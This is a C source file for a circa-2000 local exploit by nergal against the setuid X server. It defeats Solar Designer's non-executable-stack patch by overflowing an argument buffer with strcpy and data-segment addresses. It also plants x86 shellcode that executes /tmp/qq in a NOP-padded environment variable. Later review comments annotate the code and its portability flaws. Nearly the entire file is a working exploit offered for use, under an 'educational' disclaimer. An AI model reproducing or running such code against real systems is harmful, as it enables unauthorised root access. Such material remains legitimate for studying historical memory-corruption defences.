/*
** Exploit no 1 for Solar Designer patch
**  by nergal@icm.edu.pl
**  This code is meant for educational and entertaining purposes only.
**  You can distribute it freely provided credits are given.
**
*/

#include <stdio.h>

/* change the following 0 if the code doesn't work */
/* OFFSET is subtracted from the address of a stack local in main() to guess
 * where the stack sits; it is a per-build tuning knob, not derived from
 * anything in this file. */
#define OFFSET                          0
/* Length of the argv string built in main(). */
#define BUFFER_SIZE                     370
/* Length of the "EGG=..." environment string built in main(). */
#define EGG_SIZE                        2048
/* Filler byte for egg (x86 single-byte NOP opcode). */
#define NOP                             0x90

/* any address in data segment */
/* DEST and STRCPY are 32-bit absolute addresses taken from one specific
 * build of the target binary; they are neither computed nor validated here,
 * so the code only behaves as intended against that exact build. */
#define DEST                            0x08223038
/* strcpy linkage table entry */
#define STRCPY                          0x08066a18

/* Raw machine-code bytes that main() copies to the tail of `egg`. Only the
 * trailing ASCII path "/tmp/qq" is readable here; what the bytes do is not
 * evident from this file. The string must not contain a 0x00 byte because
 * main() measures and copies it with strlen()/strcpy() — none is present. */
char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/qq";

/* Globals filled in by main(); kept global so they outlive putenv()/execl(). */
char buf[BUFFER_SIZE];  /* argv string: ":9", spaces, `pattern` stamped every 16 bytes */
char egg[EGG_SIZE];     /* "EGG=" + NOP filler + shellcode; putenv() keeps a pointer
                           to this storage rather than a copy */
char pattern[16];       /* four 4-byte values written through (int *) casts in main();
                           a plain char array carries no 4-byte alignment guarantee */

/*
 * Entry point of the proof-of-concept.
 *
 * Builds two buffers and then replaces the current process with the target
 * binary:
 *   - buf:     a BUFFER_SIZE-byte argv string (":9" followed by spaces) into
 *              which the 16-byte `pattern` is copied every 16 bytes starting
 *              at offset `align`;
 *   - egg:     an environment variable "EGG=..." consisting mostly of NOP
 *              bytes with `shellcode` placed at its end.
 * How the target consumes these is not visible from this file. The
 * hard-coded DEST/STRCPY/OFFSET values tie the code to one specific 32-bit
 * build, so against any other build it does nothing useful.
 *
 * argv[1], if present, overrides `align` (parsed with atoi, no validation).
 * Does not return on success: execl() replaces the process. On failure it
 * prints the execl error and falls off the end of main.
 *
 * NOTE(review): `void main` is non-standard (C requires `int main`), and
 * atoi, exit, memset, memcpy, strcpy, strncpy, strlen, putenv and execl are
 * all used without including <stdlib.h>, <string.h> and <unistd.h> — only
 * <stdio.h> is included — so they are implicitly declared, which C99 and
 * later reject.
 */
void main(int argc, char **argv)
{
  /* try alignment in 3..18; three worked for me */
  int i, align = 3;
  /* The address of a stack local, used as an estimate of where the stack
   * is (hence the get_sp remark). Storing a pointer in an int assumes
   * 32-bit pointers (ILP32). */
  int src = (int) &src - OFFSET;  /* formerly known as get_sp() :) */

  if (argc == 2)
    align = atoi(argv[1]);  /* no range check: see the buf loop below */

  /* Four 4-byte values written straight into the 16-byte pattern through
   * int casts (type-punning a char array; relies on a 32-bit int and on
   * the compiler tolerating the unaligned access). */
  *(int *) pattern = STRCPY;
  *(int *) (pattern + 4) = DEST;
  *(int *) (pattern + 8) = DEST;
  *(int *) (pattern + 12) = src;
  /* pattern is copied into buf, which is handed to execl() as an argv
   * string, so a zero byte anywhere in it would cut that string short;
   * report the offending byte and stop instead. */
  for (i = 0; i <= 15; i++)
    if (pattern[i] == 0)
      {
        printf("zero in pattern (%i)\n", i);
        exit(1);
      }

  /* buf: ":9", then spaces, NUL-terminated in its last byte. */
  memset(buf, ' ', BUFFER_SIZE);
  buf[BUFFER_SIZE - 1] = 0;
  buf[0] = ':';
  buf[1] = '9';
  /* Stamp pattern every 16 bytes from offset `align`. The loop bound keeps
   * each 16-byte copy inside buf and leaves the trailing NUL intact, but
   * only for align >= 0: a negative argv[1] makes memcpy write before buf. */
  for (i = align; i < BUFFER_SIZE - 16; i += 16)
    memcpy(buf + i, pattern, 16);

  /* egg: "EGG=" + NOP filler + shellcode, then exported with putenv().
   * strncpy with length 4 writes no NUL (the filler continues after the
   * prefix); strcpy puts shellcode's terminating NUL at egg[EGG_SIZE - 2],
   * leaving the final byte as filler. putenv() stores a pointer to egg,
   * not a copy — acceptable only because egg is a global. */
  memset(egg, NOP, EGG_SIZE);
  strcpy(egg + EGG_SIZE - strlen(shellcode) - 2, shellcode);
  strncpy(egg, "EGG=", 4);
  putenv(egg);

  /* Replace this process with the target. The argument list is terminated
   * with a bare 0 where execl expects (char *)NULL; that only works where
   * int and pointer are the same size. execl returns only on failure. */
  execl("/usr/X11R6/bin/X", "X", buf, "-nolock", 0);
  perror("execl");
}
/*                    www.hack.co.za              [2000]*/